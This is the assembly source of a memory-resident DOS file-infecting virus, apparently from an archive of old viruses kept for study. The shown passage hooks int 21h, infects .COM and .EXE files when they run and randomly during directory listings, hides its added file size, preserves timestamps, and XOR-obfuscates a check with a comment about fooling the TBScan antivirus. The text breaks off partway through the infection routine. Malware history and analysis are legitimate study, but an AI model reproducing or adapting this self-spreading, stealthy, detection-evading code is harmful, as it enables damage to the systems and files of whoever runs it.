compo.asm

More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use

;% You-name-the-bitch %
;哪哪哪哪哪哪哪哪哪哪哪
.model tiny
.code
 org 100h

pagesize        equ     (((offset last) - (offset start)) shr 9) + 1
parasize        equ     (((offset last) - (offset start)) shr 4) + 1
bytesize        equ     (parasize shl 4)
lastpage        equ     bytesize - (pagesize shl 9)


start:
        push    ds
        call    install
entry:
        jmp     restore

; Information about host program

orgip   dw      020CDh                  ; Entry point if .exe,
orgcs   dw      0                       ; if .com first 3 bytes of file.
com     db      0FFh                    ; If .exe com=0 if .com com=FF

install:
        ; Check if already resident
        mov     ah, 30h                 ; Get dos version
        mov     bx, 1009                ; Installation check
        int     21h
        cmp     bx, 9001                ; Is installed?
        jne     gores
        mov     bp, sp                  ; Get delta offset
        mov     bp, ss:[bp]
        ret

org21:
        db      0EAh                    ; Buffer for original int21
org21o  dw      ?
org21s  dw      ?

gores:
        pop     bp
        cmp     al, 03h                 ; Check dos version
        jb      restore

        ; Try to allocate memory
memall: mov     ah, 48h                 ; Allocate memory
        mov     bx, parasize+3
        int     21h
        jnc     gohigh

        ; Try to decrease host memory
        push    es                      ; Get MCB
        mov     bx, es
        dec     bx
        mov     es, bx
        mov     bx, es:[03h]            ; Get size of memory
        sub     bx, parasize+4          ; Calculate needed memory
        pop     es
        mov     ah, 4Ah                 ; Decrease memory block
        int     21h
        jnc     memall                  ; Allocate memory for virus
        jmp     restore

gohigh:
        ; Move virus to new memory
        dec     ax                      ; es to new mcb
        mov     es, ax
        mov     word ptr es:[1], 8      ; mark dos as owner
        mov     di, 10h                 ; Set es:di to new block
        push    cs                      ; Set ds:si to virus code
        pop     ds
        mov     si, bp
        sub     si, 4                   ; Adjust for first call
        mov     cx, bytesize
        cld
        rep     movsb

        ; Install in int21 vector
        sub     ax, 0Fh                 ; Adjust for org 100h
        mov     ds, ax
        mov     ax, 3521h               ; Save int21 vector
        int     21h
        mov     org21o, bx
        mov     org21s, es
        mov     ah, 25h                 ; Set int21 vector
        mov     dx, offset vector21
        int     21h


restore:
        ; Restore original program
        pop     es
        push    es
        cmp     byte ptr cs:bp[6], 00h           ; Check file type
        je      restexe

        ; Restore .com program
        push    es
        pop     ds
        mov     di, 100h
        push    di
        mov     ax, cs:bp[2]
        stosw
        mov     al, cs:bp[4]
        stosb
        retf

restexe:
        ; Restore .exe program
        pop     ax
        mov     ds, ax
        add     ax, cs:bp[4]            ; relocate cs
        add     ax, 10h
        push    ax
        mov     ax, cs:bp[2]            ; get ip
        push    ax
        retf                            ; Jump to host



vector21:
        cmp     ah, 30h                 ; Get dos version?
        jne     chkexe
        cmp     bx, 1009                ; Installation check?
        jne     chkexe
        call    dos
        mov     bx, 9001                ; Return residency code
        retf    2
chkexe:
        cmp     ax, 4B00h               ; Load and execute?
        jne     chkfcb
        call    infect                  ; Infect file
        jmp     chnexit
chkfcb:
        cmp     ah, 11h                 ; Find file?
        je      fcb
        cmp     ah, 12h                 ; Find file?
        je      fcb

        cmp     ah, 4Eh                 ; Find handle?
        je      fhdl
        cmp     ah, 4Fh                 ; Find handle?
        jne     chnexit
fhdl:   call    dos
        jnc     fhdls
        retf    2
fhdls:  jmp     findhandle

chnexit:
        jmp     org21


fcb:
; Called on find first/find next fcb
        ; Perform dos call

        call    dos
        or      al, al                  ; Check if a file was found
        jz      exist
        retf    2
exist:
        push    ax
        push    bx
        push    cx
        push    dx
        push    si
        push    di
        push    ds
        push    es

        mov     ax, 6200h               ; Get psp
        call    dos
        mov     es, bx
        cmp     bx, es:[16h]            ; Ensure that dos is calling
        jne     fcbexit

        call    getdta                  ; Get address of fcb
        lodsb                           ; Check if extended
        cmp     al, 0FFh
        jne     noext
        add     si, 7
noext:
        mov     bx, si
        add     si, 8                   ; Check extension
        lodsw
        push    ax

        add     si, 0Ch                 ; Check for infection
        lodsb
        and     al, 1Fh
        cmp     al, 03h
        pop     ax
        pushf
        add     si, 5

        cmp     ax, 'OC'
        je      fcbcom
        cmp     ax, 'XE'
        je      fcbexe
        popf
        jmp     fcbexit

fcbcom:
        ; Check for infection
        popf
        jne     fcbcomni
        sub     word ptr [si], bytesize
        jmp     fcbexit
fcbcomni:
        in      al, 41h                 ; Get timer (rnd)
        test    al, 03h                 ; 25% infection
        jne     fcbexit
        call    cvtasciz                ; Convert to asciz
        mov     ax, 'C.'                ; Append exetnsion
        stosw
        mov     ax, 'MO'
        stosw
        jmp     fcbinfect

fcbexe:
        ; Check for infection
        popf
        jne     fcbexeni
        sub     word ptr [si], bytesize
        jmp     fcbexit
fcbexeni:
        in      al, 41h                 ; Get timer (rnd)
        test    al, 03h                 ; 25% infection
        jne     fcbexit
        call    cvtasciz
        mov     ax, 'E.'
        stosw
        mov     ax, 'EX'
        stosw

fcbinfect:
        xor     al, al
        stosb
        mov     dx, offset last
        push    cs
        pop     ds
        call    infect

fcbexit:
        pop     es
        pop     ds
        pop     di
        pop     si
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        retf    2


cvtasciz        proc
        push    cs                      ; Convert to asciz
        pop     es
        mov     si, bx
        mov     di, offset last
        mov     cx, 8
loop3:  lodsb
        cmp     al, ' '
        je      loopx
        stosb
        loop    loop3
loopx:  ret
cvtasciz        endp


infect  proc
; Called on load and execute
        push    ax
        push    bx
        push    cx
        push    dx
        push    si
        push    di
        push    ds
        push    es

        mov     ax, 3D82h               ; Open victim
        call    dos
        jc      exitinfect
        xchg    ax, bx

        mov     ax, 5700h               ; Save file date/time
        call    dos
        push    dx
        push    cx

        mov     ah, 3Fh                 ; Read first bytes
        push    cs
        pop     ds
        lea     dx, orgip
        mov     cx, 2
        call    dos
        xor     orgip, 4523h            ; Check if .exe file
        cmp     orgip, 'MZ' xor 4523h   ; TBScan fooled again...
        je      infectexe
        cmp     orgip, 'ZM' xor 4523h
        je      infectexe
        xor     orgip, 4523h
        jmp     infectcom

infectdone:
        pop     cx                      ; Restore date/time of file
        pop     dx